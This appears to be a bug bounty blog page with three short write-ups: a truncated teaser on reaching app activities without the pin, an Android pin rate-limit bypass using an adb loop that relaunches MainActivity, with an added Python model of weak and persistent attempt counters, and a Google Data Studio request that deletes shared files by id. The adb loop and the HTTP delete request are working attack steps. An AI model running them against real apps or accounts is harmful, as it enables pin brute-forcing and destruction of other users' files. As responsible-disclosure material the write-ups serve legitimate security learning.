Hitting the main activity multiple times allows viewing any activity inside the app, without even entering the mobile pin.

Bug :-

The application has a mobile pin lock: without entering the pin you cannot enter the app.

Bypass :-

But by calling internal activities like settings.activity and notifications.activity with…


Application pin rate limiting bypass

The bug is in a private program.

There is a feature to lock the mobile app with a pin, but only 3 attempts are allowed. After 3 wrong pin attempts, the app logs out.

But there is a misconfiguration in this feature. If you enter a wrong pin 2 times, close the app and open it again, you get another 3 attempts. So the rate limiting is bypassed by closing the app and calling the main activity again.

You can launch the main activity as many times as you want with adb:

while true; do adb shell am start -a android.intent.action.VIEW -n com.redacted/com.redacted.MainActivity; sleep 4; done

During the sleep time you can enter the pin 2 times; then the main activity is called again, so you can enter the pin again.
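As an added example (not code from the original post), here is a Python model of the two places the attempt counter can live: in the Activity object, which each relaunch of MainActivity resets, and in persistent storage, which a relaunch cannot refund. The `storage` dict stands in for SharedPreferences or a server-side record, and the candidate pins are constructed.

```python
MAX_ATTEMPTS = 3

class WeakPinActivity:
    # Counter lives in the activity object, so every launch of MainActivity starts at 0.
    def __init__(self, correct_pin):
        self.correct_pin, self.wrong, self.out = correct_pin, 0, False
    def enter_pin(self, pin):
        if self.out:
            return "locked"            # refuse without evaluating the guess
        if pin == self.correct_pin:
            return "unlocked"
        self.wrong += 1
        if self.wrong >= MAX_ATTEMPTS:
            self.out = True
            return "logged_out"        # this wrong guess triggered the logout
        return "retry"

class HardenedPinActivity:
    # Counter is read from and written to storage (a dict standing in for SharedPreferences
    # or a server-side record), so relaunching the activity or process refunds nothing.
    def __init__(self, correct_pin, storage):
        self.correct_pin, self.store = correct_pin, storage
        self.store.setdefault("wrong", 0)
        self.store.setdefault("out", False)
    def enter_pin(self, pin):
        if self.store["out"]:
            return "locked"
        if pin == self.correct_pin:
            self.store["wrong"] = 0
            return "unlocked"
        self.store["wrong"] += 1
        if self.store["wrong"] >= MAX_ATTEMPTS:
            self.store["out"] = True
            return "logged_out"
        return "retry"

def guesses_until_logout(make_activity, candidate_pins, per_launch=2):
    # Replays the relaunch trick from the write-up: `per_launch` guesses, then a fresh
    # activity. Returns (guesses actually evaluated, whether one of them unlocked the app).
    evaluated, pins = 0, iter(candidate_pins)
    while True:
        activity = make_activity()          # one `am start` of MainActivity
        for _ in range(per_launch):
            pin = next(pins, None)
            if pin is None:
                return evaluated, False     # ran out of candidate pins
            result = activity.enter_pin(pin)
            if result != "locked":
                evaluated += 1
            if result != "retry":
                return evaluated, result == "unlocked"
```

With the weak counter every candidate pin is evaluated; with the persisted counter the third wrong guess logs the app out and later launches stay locked.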

Impact :- mobile auth pin rate limiting bypassed

No thanks for reading ..!


Description :

An attacker can delete any file via the vulnerable endpoint.

Endpoint :

POST /u/4/deleteShareable?appVersion=20190926_020020 HTTP/1.1
Host: datastudio.google.com
Connection: close
Content-Length: 54
Sec-Fetch-Mode: cors
Origin: https://datastudio.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
encoding: null
Sec-Fetch-Site: same-origin
Referer: https://datastudio.google.com/u/4/navigation/reporting
Cookie: RAP_XSRF_TOKEN=ACQ5uE-fZxoHyJIMJ6I9fWifDGZzjTeHCw:1569756166600; gh_7510439=;

{"id":"9c491b49-a2f7-49fe-bd91-c4783657781","type":0}

Vulnerable parameter : id

Guessing the id is not possible here. But if the victim has shared their file, the id is visible in the URL path.

Triage Time

September 29, 2019 : Reported

Oct 1, 2019 : Triaged

Oct 8, 2019 : Bounty awarded, $5k

No thanks for reading the report :-

baluz

For more hidden tips visit https://balook.github.io
